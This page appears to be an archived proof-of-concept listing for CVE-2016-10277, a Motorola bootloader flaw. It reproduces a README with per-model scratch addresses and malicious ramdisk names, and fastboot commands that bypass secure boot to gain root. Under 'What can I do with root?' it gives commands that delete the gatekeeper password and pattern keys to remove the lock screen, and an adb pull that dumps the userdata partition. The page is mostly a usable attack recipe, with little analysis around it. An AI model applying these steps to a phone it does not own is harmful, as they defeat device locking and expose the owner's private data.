Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2016-10277 PoC — Android Motorola bootloader 权限许可和访问控制漏洞

Source
https://github.com/leosol/initroot
Associated Vulnerability
Title:Android Motorola bootloader 权限许可和访问控制漏洞 (CVE-2016-10277)
Description:Android on Nexus 6是美国谷歌(Google)公司和开放手持设备联盟(简称OHA)共同开发的一套运行于Nexus 6(智能手机)等中并以Linux为基础的开源操作系统。Motorola bootloader是其中的一个美国摩托罗拉(Motorola)公司的装载程序。 Nexus 6设备上的Android中的Motorola bootloader存在提权漏洞。攻击者可借助本地恶意的应用程序利用该漏洞在bootloader上下文中执行任意代码。
Description
Exploiting CVE-2016-10277 for Secure Boot and Device Locking bypass
Readme
# Exploiting CVE-2016-10277
More information at: https://alephsecurity.com/2017/06/07/initroot-moto/

If you just want to check if your device is vulnerable, 
it might be quicker if you just flash stock ramdisk (without any modifications). 
If it's your case, just look for ``initroot-*-STOCK*.cpio.gz``.

## Motorola XT-1033
- Scratch Address: 0x11000000
- Padding: 64MB
- Stockrom padded ramdisk: initroot-xt1033-p64-STOCK.cpio.gz
- Stockrom patched and padded ramdisk: initroot-xt1033-p64-MALICIOUS.cpio.gz

## Motorola XT-1040
- Scratch Address: 0x11000000
- Padding: 64MB
- Stockrom padded ramdisk: initroot-xt1040-p64-STOCK.cpio.gz
- Stockrom patched and padded ramdisk: initroot-xt1040-p64-MALICIOUS.cpio.gz

## Motorola XT-1068
- Scratch Address: 0x11000000
- Padding: 64MB
- Stockrom padded ramdisk: initroot-xt1068-p64-STOCK.cpio.gz
- Stockrom patched and padded ramdisk: initroot-xt1068-p64-MALICIOUS.cpio.gz

## Motorola XT-1069
- Scratch Address: 0x11000000
- Padding: 64MB
- Stockrom padded ramdisk: initroot-xt1069-p64-STOCK.cpio.gz
- Stockrom patched and padded ramdisk: initroot-xt1069-p64-MALICIOUS.cpio.gz

## Motorola XT-1078
- Scratch Address: 0x11000000
- Padding: 64MB
- Stockrom padded ramdisk: initroot-xt1078-p64-STOCK.cpio.gz
- Stockrom patched and padded ramdisk: initroot-xt1078-p64-MALICIOUS.cpio.gz

## Motorola XT-1514
- Scratch Address: 0x90000000
- Padding: 64MB
- Stockrom padded ramdisk: initroot-xt1514-p64-STOCK.cpio.gz
- Stockrom patched and padded ramdisk: initroot-xt1514-p64-MALICIOUS.cpio.gz



## Running and cheking root access: 
  - Flashing and solving bootloops: 
  
        git clone https://github.com/leosol/initroot.git
        cd xt1040 (or any other folder)
        use ./run-malicious.sh, run-stockramfs.sh and solve-bootloop.sh (if you have any bootloop)
        Or use the following commands:
		fastboot flash aleph $FILE_NAME
		fastboot oem config fsg-id "a initrd=SCRATCH+PAD,LENGTH"
		fastboot continue
		#use the following to solve bootloops
		fastboot oem config fsg-id ""

  - Checking root privileges:   
  
        root@debian-vaio:~/motoramfs/xt1040# adb devices
        List of devices attached
        * daemon not running. starting it now on port 5037 *
        * daemon started successfully *
        T0092020C5	device

        root@debian-vaio:~/motoramfs/xt1040# adb shell
        root@peregrine:/ # getenforce
        >Permissive

  - What can I do with root?   

        #remove authentication as pointed out by @kraftdenker (tested on xt1068)
        mv /data/system/gatekeeper.password.key /data/system/_gatekeeper.password.key
        mv /data/system/gatekeeper.pattern.key /data/system/_gatekeeper.pattern.key

        #dump your data
        adb pull /dev/block/platform/msm_sdcc.1/by-name/userdata

        #or make it permanent
File Snapshot

 [4.0K]  /data/pocs/9c52df978d98e27bfeaf8828ba4300d94050e99d
├── [4.0K]  misc
│   └── [4.0K]  xt1040
│       ├── [4.0K]  gesture-L
│       │   ├── [  20]  gesture.key
│       │   ├── [4.0K]  locksettings.db
│       │   ├── [ 32K]  locksettings.db-shm
│       │   ├── [193K]  locksettings.db-wal
│       │   └── [  72]  password.key
│       └── [4.0K]  pin-123456
│           ├── [  20]  gesture.key
│           ├── [4.0K]  locksettings.db
│           ├── [ 32K]  locksettings.db-shm
│           ├── [161K]  locksettings.db-wal
│           └── [  72]  password.key
├── [2.7K]  README.md
├── [4.0K]  xt1033
│   ├── [ 65M]  initroot-xt1033-p64-MALICIOUS.cpio.gz
│   ├── [ 65M]  initroot-xt1033-p64-STOCK.cpio.gz
│   ├── [ 195]  run-malicious.sh
│   ├── [ 190]  run-stockramfs.sh
│   └── [  81]  solve-bootloop.sh
├── [4.0K]  xt1040
│   ├── [ 65M]  initroot-xt1040-p64-MALICIOUS.cpio.gz
│   ├── [ 65M]  initroot-xt1040-p64-STOCK.cpio.gz
│   ├── [ 195]  run-malicious.sh
│   ├── [ 191]  run-stockramfs.sh
│   └── [  81]  solve-bootloop.sh
├── [4.0K]  xt1068
│   ├── [ 65M]  initroot-xt1068-p64-MALICIOUS.cpio.gz
│   ├── [ 65M]  initroot-xt1068-p64-STOCK.cpio.gz
│   ├── [ 195]  run-malicious.sh
│   ├── [ 190]  run-stockramfs.sh
│   └── [  81]  solve-bootloop.sh
├── [4.0K]  xt1069
│   ├── [ 65M]  initroot-xt1069-p64-MALICIOUS.cpio.gz
│   ├── [ 65M]  initroot-xt1069-p64-STOCK.cpio.gz
│   ├── [ 195]  run-malicious.sh
│   ├── [ 190]  run-stockramfs.sh
│   └── [  81]  solve-bootloop.sh
├── [4.0K]  xt1078
│   ├── [ 65M]  initroot-xt1078-p64-MALICIOUS.cpio.gz
│   ├── [ 65M]  initroot-xt1078-p64-STOCK.cpio.gz
│   ├── [ 195]  run-malicious.sh
│   ├── [ 190]  run-stockramfs.sh
│   └── [  81]  solve-bootloop.sh
└── [4.0K]  xt1514
    ├── [ 65M]  initroot-xt1514-p64-STOCK.cpio.gz
    ├── [ 547]  run-malicious.sh
    ├── [ 190]  run-stockramfs.sh
    └── [  81]  solve-bootloop.sh

10 directories, 40 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.